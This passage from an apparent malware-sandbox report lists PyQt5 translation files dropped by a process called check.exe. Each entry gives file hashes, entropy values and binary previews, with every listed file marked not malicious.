                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qtbase_gd.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):189580
                                                                                                                                                                                                                                      Entropy (8bit):4.630160941635514
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:SiaI3C87jhakhR0VGkw7ys7CskUH6y4e6IFB4xyMuhvDnJGhFaCo527arBbm07LZ:S2yGjh17yGqxTXhvQoejJd8FUjVgk
                                                                                                                                                                                                                                      MD5:EB1FB93B0BE51C2AD78FC7BA2F8B9F42
                                                                                                                                                                                                                                      SHA1:24F7FF809E2F11C579CD388FEA5A4C552FF8D4D0
                                                                                                                                                                                                                                      SHA-256:63B439DD44139AA3AED54C2EBE03FA9BC77F22C14ED8FBA8EFF2608445BB233D
                                                                                                                                                                                                                                      SHA-512:E13770AEF33B6666ED7D54E03EE20CA291D4167D673BA6C61D8E64CDD5F7FFE0A9521B95AF67BE719BF263932ECF16E2B2D0B5F3404F9BCD7879114FCC6FC474
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......gd_GBB..2....*...u...+......@.......A...B...B.......C.......D.. ....E.. ....F..!&...G..!J...H..!n...I..!....P..#m...Q..#....R..#....S..$....T..$$...U..$H...V..$....W..$....X..$....Y..%....]../....s...'...t...................F...;.......;../....;..=V...;..G....M../G...O.......O...k......$....}../o.......i...=.......m../....t..........[...(5..M...+;..@...+;..x...+O..:...1...\7..D@...f..E@..#...H4...p..HY..be..H.......IC......J.......J....R..J.......LD......L.......PS......QR..#l..R...g...T.......U.......X....\..Zr......[`......\...&...]x......_....C.._...'t..yg..?...1...BM...E..D.......;.......R'.......t.......@.......?...$..c....[......,...i...y.......y...Y.......f.......+...........9..c....E...............z.."....................%..U....D..................G.....UB.....W......\]...5.......0.......0..<....0...;...0.......5.......5..ij..............h... D..0... D..aC..+....K..<U.....<U...~..<.......H5..0...H5..a...L....1..VE..$...VE..X...V...8|..f...Z...f...=..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qtbase_he.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):138690
                                                                                                                                                                                                                                      Entropy (8bit):5.515748942553918
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:XSue8Z7T3iJsqBejt/zNHSLzdetY2ZISfC/S:XSueK3w7Ijt8zUtYAISfC/S
                                                                                                                                                                                                                                      MD5:DEAF87D45EE87794AB2DC821F250A87A
                                                                                                                                                                                                                                      SHA1:DB39C6BAA443AA9BB208043EF7FB7E3403C12D90
                                                                                                                                                                                                                                      SHA-256:E1EBCA16AFE8994356F81CA007FBDB9DDF865842010FE908923D873B687CAD3F
                                                                                                                                                                                                                                      SHA-512:276FCE81249EFFE19E95607C39F9ACB3A4AFA3F90745DA21B737A03FEA956B079BCA958039978223FD03F75AC270EC16E46095D0C6DDA327366C948EC2D05B9C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......he_ILB../....*......+..Sw...@......A......B.......C.......D...X...E.......F.../...G...O...H...o...I......P.......Q.......R...I...S...i...T......U......V.......W.......X.../...Y...O...]..$....s......t..X:.......4......`Y...;..$....;..%....;.......;...5...;.......M..$....O...6...O..s............}..%-...........=...m...m..%k...t..........^..(5......+;..2...+;..^...+O...N..1.......D@......E@...(..H4..T...HY..L...H..._...IC..\...J...\...J.......J...\j..LD..^...L...^o..PS..fl..QR......R...Q...T...su..U...s...X...x3..Zr..~...[`..L\..\.......]x....._......._....o..yg...(..1...3....E..5C.......z......?V......U.......U.......W....$..M....[..W....,..X....y.......y..\........a..............\@...9..NO...E...?......]s...z...G.......(......^....%..B^...D.._......._.................... ..........5..`/...0.......0...L...0......0..d(...0......5..ek...5..........fB......R... D..&O.. D..K...+...l...<U......<U..p)..<...p...H5..&w..H5..La..L...s...VE......VE......V.....

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qtbase_hu.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):160494
                                                                                                                                                                                                                                      Entropy (8bit):4.831791320613137
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:BmOMZadV9n51xXeQvjOiIzz7/Vs9Db3ihuJNvMfWxBNlYzYbTrIkfwb03l24cNKu:HkWa5pg0MahBHDd
                                                                                                                                                                                                                                      MD5:E9D302A698B9272BDA41D6DE1D8313FB
                                                                                                                                                                                                                                      SHA1:BBF35C04177CF290B43F7D2533BE44A15D929D02
                                                                                                                                                                                                                                      SHA-256:C61B67BB9D1E84F0AB0792B6518FE055414A68E44D0C7BC7C862773800FA8299
                                                                                                                                                                                                                                      SHA-512:12947B306874CF93ABA64BB46FAC48179C2D055E770D41AF32E50FFFB9F0C092F583AFCEA8B53FE9E238EF9370E9FFFBEB581270DFA1A7CB74EBE54D9BFF459F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......hu_HUB../....*.......+.......@.......A...0...B...{...C.......D.......E.......F.......G...<...H...`...I.......P...s...Q.......R.......S.......T...*...U...N...V.......W.......X.......Y.......]..+y...s.......t.......................;..+Q...;..,U...;.......;.......;..&....M..+....O.......O...U..........}..+............=.......m..+....t..........9c..(5..,...+;..;...+;..m7..+O......1...9...D@...T..E@......H4...v..HY..Y...H.......IC......J.......J.......J.......LD......L.......PS...}..QR..!...R...]...T.......U....{..X.......Zr...=..[`......\....*..]x...-.._......._......yg...M..1...<....E..>...............J........T.......(.......S...$..Z....[.......,...u...y.......y...[...............#...........9..Z....E..#&...........z..!'...................%..Mv...D..._....................32.....5......9....5.......0...h...0...E...0.......0.......0..#....5...Z...5...........G......_2.. D..,... D..W...+....W..<U......<U...B..<.......H5..,...H5..X{..L....)..VE.."...VE..6l..V....*.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qtbase_it.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):161172
                                                                                                                                                                                                                                      Entropy (8bit):4.680034416311688
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:eSfxfdO4BKJb0td5pqCOIUP/PFIM7gxGQ9sRrFM6QJ4m8ihkM:eSfxFO4BKJb0td5pnOrvCqg9mRK4IkM
                                                                                                                                                                                                                                      MD5:88D040696DE3D068F91E0BF000A9EC3E
                                                                                                                                                                                                                                      SHA1:F978B265E50D14FDDE9693EC96E99B636997B74D
                                                                                                                                                                                                                                      SHA-256:7C7DC8B45BF4E41FEC60021AB13D9C7655BE007B8123DB8D7537A119EB64A366
                                                                                                                                                                                                                                      SHA-512:F042637B61C49C91043D73B113545C383BD8D9766FD4ACC21675B4FF727652D50863E72EA811553CB26DF689F692530184A6CE8FE71F9250B5A55662AFE7D923
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......it_ITB../....*.......+.......@.......A..."...B...m...C.......D.......E.......F.......G...0...H...T...I...x...P...q...Q.......R.......S.......T...(...U...L...V.......W.......X.......Y.......]..+....s...'...t...................^...;..+[...;..,g...;.......;.......;..!B...M..+....O...D...O...........(...}..+........I...=.......m..,....t..........4...(5..'...+;..<...+;..oV..+O......1...5...D@...F..E@......H4...J..HY..Z...H.......IC...L..J....s..J....j..J.......LD......L....f..PS......QR..!...R..._...T.......U....3..X.......Zr......[`...Q..\.......]x......_......._....0..yg...C..1...=....E..?o..............Kf.......h.......8.......I...$..[....[.......,...m...y...9...y...........z.......z...........9..\=...E..$u.......:...z.. k...................%..N....D..................M............0......5/...5...2...0.......0...0...0...A...0...)...0..$....5.......5...J.......a......a... D..,... D..Y...+.......<U......<U......<....v..H5..-...H5..Z...L.......VE.."c..VE..1...V....X.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qtbase_ja.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):129911
                                                                                                                                                                                                                                      Entropy (8bit):5.802855391832282
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:W8YYSCjKBJ26c1Z7f25pVmuLXpxfqt7FEUWNrfQje9kWI23pKXvx:xYuKBJ01Z7u5pQuLbESUWNzAAI23pKfx
                                                                                                                                                                                                                                      MD5:608B80932119D86503CDDCB1CA7F98BA
                                                                                                                                                                                                                                      SHA1:7F440399ABA23120F40F6F4FCAE966D621A1CC67
                                                                                                                                                                                                                                      SHA-256:CBA382ACC44D3680D400F2C625DE93D0C4BD72A90102769EDFD1FE91CB9B617B
                                                                                                                                                                                                                                      SHA-512:424618011A7C06748AADFC2295109D2D916289C81B01C669DA4991499B207B781604A03259C546739A3A6CF2F8F6DFA753B23406B2E2812F5407AEE343B5CBDD
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......jaB../....*...'...+..=....@.......A.......B...?...C...c...D......E......F.......G.......H..."...I...F...P.......Q...'...R...r...S......T......U.......V...8...W...\...X......Y......].."k...s...Q...t..A...............I....;.."C...;..#A...;.......;.......;.......M.."....O...B...O..[?......h....}.."........m...=.......m.."....t...........M..(5......+;......+;..WU..+O......1.......D@......E@...K..H4..>=..HY..F...H...Hr..IC..E...J...F...J.......J...E...LD..Gz..L...G...PS..O...QR......R...K!..T...Z...U...[e..X..._f..Zr..e...[`..7...\...i...]x...'.._......._...j...yg..~+..1.../....E..1?.......#......:.......?.......?n......A....$..G....[..Ap...,..B....y.......y..Ew......|...............E....9..H....E..........F....z...]..............HL...%..=R...D..H.......I!......[......J......M..........5..It...0...3...0.......0...C...0..M....0...a...5..N....5..........N.......L6.. D..#... D..E...+...U%..<U......<U..X ..<...X...H5..#...H5..FK..L...[...VE......VE......V......f.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qtbase_ko.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):156799
                                                                                                                                                                                                                                      Entropy (8bit):5.859529082176036
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:rvTy18hhPekHs1iNXVExWbStnn8TExgkYOvYejZOvXx4Mmf0MwUL8smk/pDZyy:y18hJ61nMStnn8TOgknQRLWZmkxNyy
                                                                                                                                                                                                                                      MD5:082E361CBAC2E3A0849F87B76EF6E121
                                                                                                                                                                                                                                      SHA1:F10E882762DCD2E60041BDD6CC57598FC3DF4343
                                                                                                                                                                                                                                      SHA-256:0179ED1B136E1CB3F583351EAA2C545BA3D83A6EE3F82C32505926A1A5F5F183
                                                                                                                                                                                                                                      SHA-512:F378A42116924E30FA0B8FFF1D3C3CB185DC35B2746DCE2818BE7C2AA95C5DE103DF44AAC74DA969C36C557F1D4DE42AC7647EC41066247F8AD2697BDED667EA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......koB..7....*.......+.......@...K...A...o...B......C.......D...8...E.......F...U...G...y...H......I.......P......Q.......R.......S...C...T...g...U.......V.......W.......X...-...Y...Q...]..$....s...>...t...................y...;..${...;..%....;...u...;...l...M..$....O.......O...8...........}..$............=...C...m..%!...t...n..........(5...a..+;..E@..+;..l|..+O......1.......D@.....E@......H4......HY..\...H....]..IC......J.......J....8..J.......LD...a..L.......PS......QR......R...`...T.......U....^..U.......X....y..Zr......[`..y...\....A..]x......_......._....o..yg......1...FJ...E..HE...7..................Q........a.......5...........$..]....[...;...,.......y.......y...V...............!.......|...9..]....E...R...........z...4.......f.......5...%..Te...D..................D......^.............*...5...S...0.......0.......0.......0.......5.......5...........n......a... D..%... D..[...+.......<?......<U...;..<U...+..<.......H5..&...H5..\...L.......VE......V....A..f.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qtbase_lv.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153608
                                                                                                                                                                                                                                      Entropy (8bit):4.843805801051326
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:y5pmbKIhooMbGe91MrjOhmGzP6LJbWz5XIxELpU6:yObeqrjPGzeJyJLy6
                                                                                                                                                                                                                                      MD5:BD8BDC7BBDB7A80C56DCB61B1108961D
                                                                                                                                                                                                                                      SHA1:9538C4D8BB9A95C0D9DC57C7708A99DD53A32D1F
                                                                                                                                                                                                                                      SHA-256:846E047573AE40C83671C3BA7F73E27EFC24B98C82701DA0DF9973E574178BB2
                                                                                                                                                                                                                                      SHA-512:F040EC410EBFEA21145F944E71ADCAE8E5F60907D1D3716A937A9A59A48F70C6B7EAAC91C2C554F59357A7BC820CDBD17C73A4DECC20B51F68EB79EDD35C5554
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......lv_LVB.......*...B...+..y....@.......A...=...B......C......D.......E.......F...#...G...G...H...k...I.......P...~...Q......R.......S.......T...5...U...Y...V......W.......X.......Y.......]..%....s.......t...8.......n.......A...;..&....;.......;...!...;...A...;../....M..%....O.......O...............}..%...........=.......m..&....t...(......(g..(5...+..+;..4...+;..d...+O......1...(...D@...a..E@......H4..z...HY..Q...H.......IC......J....6..J.......J.......LD......L....9..PS......QR......R...U...T....S..U.......X...._..Zr......[`..r...\.......]x...*.._......._....{..yg......1...5v...E..7........(......B.......|.......|W......~r...$..R....[..~....,.......y...l...y...............................9..S....E...g...........z...z...................%..F....D........................"Z.....$......)....5.......0...\...0.......0...r...0.......0.......5...a...5..........J......V... D..&... D..P...+.......<U......<U......<.......H5..'"..H5..P...L....~..VE...R..VE..%...V......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qtbase_pl.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):162982
                                                                                                                                                                                                                                      Entropy (8bit):4.841899887077422
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:sXpestp/YIFtDT8FIWYbIJmPYuIpnmxAk6mwyJNqSm9+P:sxpTDT8FIWfJmdCmxApmbnqSm9+P
                                                                                                                                                                                                                                      MD5:F9475A909A0BAF4B6B7A1937D58293C3
                                                                                                                                                                                                                                      SHA1:76B97225A11DD1F77CAC6EF144812F91BD8734BD
                                                                                                                                                                                                                                      SHA-256:CE99032A3B0BF8ABAD758895CC22837088EAD99FD2D2514E2D180693081CFE57
                                                                                                                                                                                                                                      SHA-512:8A4F1B802B6B81FF25C44251FB4A880E93E9A5FE25E36825A24BFE0EFB34E764E7E1EE585D3A56554964B7921E7813C67F12D200D6E0C5EAF4BB76B064B5C890
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......pl_PLB..0....*.."....+.......@...F...A...j...B......C.......D...3...E.......F...P...G...t...H.......I.......P.......Q.......R.......S...>...T...b...U.......V.......W.......X...(...Y...L...]..*....s.......t...r.......o.......+...;..*....;..+....;..."...;... ...M..*....O...6...O...........a...}..+...........=.......m..+G...t...G......,...(5......+;..:...+;..k...+O......1...-[..D@.....E@......H4...U..HY..WU..H.......IC......J....6..J.......J.......LD......L....%..PS......QR.. ...R...[...T....1..U.......X......Zr......[`......\.......]x...A.._......._....}..yg......1...;W...E..=........%......H....................$..Xp...[.......,.......y...i...y...........}......$R...........9..X....E..+)...........z.. E...................%..K....D...p....................&......(......-....5.......0.......0...e...0.......0..+....5...]...5...........f......]-.. D..,%.. D..V?..+....V..<U......<U......<....-..H5..,M..H5..V...L....Z..VE..!...VE..)...V.......f...P...f....K..f......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qtbase_ru.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):203767
                                                                                                                                                                                                                                      Entropy (8bit):5.362551648909705
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:hn4dEJ63pdhPpy6gu5fs4MHQv6sLlxnrncF423ZL9xyuXwdcX8LZuf76CW+WeXFx:aN3pdV5fZbpItXsttRY+WSq
                                                                                                                                                                                                                                      MD5:5096AD2743BF89A334FBA6A2964300D4
                                                                                                                                                                                                                                      SHA1:405F45361A537C7923C240D51B0FF1C46621C203
                                                                                                                                                                                                                                      SHA-256:3DA6605668F9178D11A838C4515478084DCFB4F9CF22F99D7A92B492DB9C224B
                                                                                                                                                                                                                                      SHA-512:7B88B501792B5831426BAA669138192ED94CC3F8323A3DF9D5287655DC4D877706908C517AB7523AE8A283BF50B47123F13B8AE40EA2F3081C3459EDC47FC8DD
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ru_RUB..7....*...L...+...W...@..,....A..,....B..-1...C..-U...D..-....E...r...F.......G.......H../....I../8...P..1'...Q..1K...R..1....S..1....T..1....U..2....V..2\...W..2....X..2....Y..2....].......s..$c...t...'......%........r...;..-....;.......;..J....;..V....M...C...O.......O..&.......8....}...m......+3...=..+....m.......t..+.......p...(5..]@..+;..[0..+;......+O..H...1...qM..D@..-...E@..1o..H4...p..HY..xm..H....*..IC...@..J....g..J.......J.......LD......L....p..PS......QR..!...R...}...T...&...U...'...U...ki..X...+...Zr..3...[`......\...:...]x..)..._......._...;...yg..S...1...\....E..__...7.........H.......k................j.......U...$..y....[.......,.......y...k...y...............................9..y....E...O...........z..!*...................%..nW...D.................%w.....g......j~.....qw...5...H...0.......0..I....0..._...0......5.......5..................~... D../k.. D..wa..+....?..<?.."t..<U......<U.."...<...#z..H5../...H5..w...L...&...VE.."...V...F$.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qtbase_sk.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):125763
                                                                                                                                                                                                                                      Entropy (8bit):4.80343609423322
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:roXDuC1u/2lUBGjJirE5tsd/aev1GIfOdvhw:OucMGjH5tbm
                                                                                                                                                                                                                                      MD5:3D60E50DCBCBD70EE699BC9B1524FCB9
                                                                                                                                                                                                                                      SHA1:0211B4911B5B74CC1A46C0FCA87D3BF5632AA44A
                                                                                                                                                                                                                                      SHA-256:D586AE2C314074CF398417FDECB40709D5478DFEB0A67C2FE60D509EE9B59ED7
                                                                                                                                                                                                                                      SHA-512:F98211867F1DBCB8A342C00E23FA5718BE6E999F7449CB8470B41BF0F527C7F78CC4D6666E28968F32E96026907156753979BFADA7E6BF4225D02A902D24906D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......sk_SKB..$x...*.......+..>....@......A......B.......C.......D...3...E...Z...F......G......H.......I.......P.......Q...D...R.......S......T.......U.......V...1...W...X...X.......Y......]...Y...t..D-......K....;...3...;.......;.......;......;...V...M.......O.._ ......l....}.......m...........T..(5...(..+;......+;..%...+O......1......E@...k..F.......H4..?I..HY..@7..H...J...I....,..IC..HT..J...H{..J...H...LD..J"..L...Jv..PS..Q...R...D...Zr..i]..[`..7...\...nB.._...o...1...&....E..(........B......19......A.......A....$..AF...[..C....,..D....y..G.......v........g......G....9..A....E..........IH...%..4.......Kf..............................5..K....0...,...0.......0.......0..Of...0.......5..P....5..........E... D...C.. D..?'..+...Y`..<U......<U..\...<...]...H5...m..H5..?...L...^...VE......f.......f...8...g.......l...aP.......................6......d....D..f(...`..f...............?....`..h5...y..H....5..j........E...e.......e..@....... ......>......oZ......l..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qtbase_tr.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):194487
                                                                                                                                                                                                                                      Entropy (8bit):4.877239354585035
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:yRRhAFCvqDBitD/iDG9AOH+l4TcwZBPqHo9fd9CFRK+2IKAimxsjucV2p0ZqvRu7:yRRHs5mksWVX3lA3
                                                                                                                                                                                                                                      MD5:6CBC5D8E1EABEC96C281065ECC51E35E
                                                                                                                                                                                                                                      SHA1:4E1E6BA3772428227CB033747006B4887E5D9AD1
                                                                                                                                                                                                                                      SHA-256:6A0BF6E70E7920C2B193E76E92F78F315936955D3B06AC039D917F2E06C43281
                                                                                                                                                                                                                                      SHA-512:CE1F9EE180176153D5F523D71E0DB06F4DEA65C24E5E2CD56341CFAEE349A8E9A0F606D99F7219A35DD4516D1528C90AEA4BB87548A55392B8F2B36164D478B1
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......tr_TRB..7....*.......+...-...@.......A.......B.......C...%...D.......E...F...F.......G.......H.......I.......P.. ....Q.. ....R..!D...S..!h...T..!....U..!....V.."....W.."0...X.."T...Y.."x...]..,g...s.../...t......................;..,9...;..-I...;..9@...;..E....M..,....O.......O...G...........}..,............=...\...m..,....t.........._3..(5..LJ..+;..Wt..+;...\..+O..7...1..._...D@......E@..!...H4...@..HY..t...H....2..IC...r..J......J....D..J....K..LD...$..L....x..PS......QR..!...R...x...T.......U....q..U...Y...X...."..Zr...%..[`......\....:..]x......_......._.......yg..6...1...X....E..[....7...Z......7Q......f............................$..u....[...:...,...5...y.......y...........7...............!...9..u....E...........P...z.. ........p...........%..j....D..................A.....U......Y......_....5...V...0.......0..8....0...U...0.......5.......5..~b..............z+.. D..-... D..s...+.......<?...8..<U...s..<U...p..<.......H5..-...H5..s...L.......VE.."0..V...4..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qtbase_uk.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):158274
                                                                                                                                                                                                                                      Entropy (8bit):5.402056706327934
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:jXwjFVUDdMUD4TzdAhpQgO5poZHvJllEnhmdK4I77/dnPJX/imfb1jhvv3BxT8ue:jBzD4Tzaw5pCvJ8hVPdlvj3p8
                                                                                                                                                                                                                                      MD5:D6234E4E21021102B021744D5FA22346
                                                                                                                                                                                                                                      SHA1:63A14327D0CF0941D6D6B58BFA7E8B10337F557B
                                                                                                                                                                                                                                      SHA-256:51B8FF55B37DC5907D637A8DDDA12FBE816852B0244C74EB4F0FB84867A786E0
                                                                                                                                                                                                                                      SHA-512:37D24A092C5F29BACB7A4CA8207C4EEFD0F073B7E74A492402867F758084091BF1D79D2BA2B4A28B35FEF42E8023C371FDE97578F74BB2033551154E77102DE6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......uk_UAB../....*...E...+...l...@.......A.......B...G...C...k...D.......E.......F.......G.......H...*...I...N...P...=...Q...a...R.......S.......T.......U.......V...r...W.......X.......Y.......]..*y...s.......t...........;.......n...;..*Q...;..+U...;.......;...x...;..!(...M..*....O.......O...........6...}..*........E...=.......m..*....t..........3...(5..&...+;..:...+;..k0..+O...A..1...4-..D@... ..E@......H4...8..HY..W...H....2..IC...V..J....}..J.......J....%..LD...&..L....z..PS......QR.. ...R...\...T....(..U.......X.......Zr......[`..~...\.......]x......_......._....4..yg...c..1...;....E..=w.......m......I............................$..X....[...<...,.......y.......y...........M...................9..Y....E...F.......D...z.. ........P...........%..LB...D.......................-n...../......4W...5...F...0...p...0...W...0.......0...k...0.......5.......5..................^... D..+... D..V...+.......<U.../..<U......<....>..H5..+...H5..V...L....S..VE..!...VE..0...V......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qtbase_zh_TW.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):127849
                                                                                                                                                                                                                                      Entropy (8bit):5.83455389078597
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:Fv2cHP10gOs6dcFxsJopMqOWv2WIrPFP8pa:Fh6s6iFxEodjef8pa
                                                                                                                                                                                                                                      MD5:9C6A3721D01ECAF3F952CE96F46CE046
                                                                                                                                                                                                                                      SHA1:4A944E9E31DF778F7012D8E4A66497583BFD2118
                                                                                                                                                                                                                                      SHA-256:085D29EAF9BBB788B2F2503D74A1EF963A9411CEB600441254CE49A120E1AB63
                                                                                                                                                                                                                                      SHA-512:6E2807B8785F42A26C9CCBDBA0327DD40B529B10C468593F0E74113774D1CCDAA4FD9ACE9B259B9040E1475911428ECAEA49425B0F170862CF8147D23DB48E46
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......zh_TWB..2x...*.......+..)....@.......A.......B...j...C......D.......E......F.......G...)...H...M...I...q...P...%...Q...I...R......S......T.......U.......V...Z...W...~...X......Y.......]..!....s.......t..-...............4....;..!z...;.."|...;.......;.......M..!....O.......O..Ay......N)...}..!............=.......m.." ...t...(.........(5......+;..;...+;.._...+O......1.......D@...C..E@...m..H4..*W..HY..Pm..H...3...IC..1...J...1...J.......J...1...LD..2...L...38..PS..6...QR...T..R...T...T...A...U...A...X...E...Zr..K...[`..$...\...OW..]x......_......._...P...yg..a^..1...<....E..>....7...>.......;......Fo......+.......+.......-L...$..QR...[..-....,...F...y.......y..1J...............6......1p...9..Q....E..........2....z...........<......3....%..H....D..4W......4}....................Z...... ...5..4....0...?...0...K...0..5....0...L...5..6....5..........6.......U... D.."... D..O...+...<%..<U......<U..>...<...?:..H5..#...H5..O...L...AS..VE...M..VE......V.......f...L..

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\QtCore.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2483712
